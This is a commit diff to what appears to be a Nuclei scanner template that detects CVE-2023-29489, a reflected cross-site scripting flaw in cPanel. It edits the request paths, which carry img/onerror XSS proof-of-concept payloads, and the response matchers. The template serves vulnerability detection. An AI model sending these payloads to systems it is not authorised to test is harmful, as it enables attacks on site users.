updated req and matcher

2024-04-13 15:14:27 +05:30 · 2024-04-13 15:14:27 +05:30 · 9062ceb8a8
parent c78061a124
commit 9062ceb8a8
1 changed files with 4 additions and 6 deletions
--- a/http/cves/2023/CVE-2023-29489.yaml
+++ b/http/cves/2023/CVE-2023-29489.yaml
@ -1,7 +1,7 @@
 id: CVE-2023-29489

 info:
-  name: cPanel - Cross-Site Scripting
+  name: cPanel < 11.109.9999.116 - Cross-Site Scripting
  author: DhiyaneshDk,0xKayala
  severity: medium
  description: |
@ -36,17 +36,15 @@ http:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
-      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
-      - '{{BaseURL}}/cpanelwebcall/<><img%20src=1%20onerror=alert("XSS-POC-by-0xKayala")>'
+      - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'

+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
-          - '<img src=x onerror="prompt(1)">aaaaaaaaaaaa'
-          - '<><img src=1 onerror=alert("XSS-POC-by-0xKayala")>'
          - 'Invalid webcall ID:'
        condition: and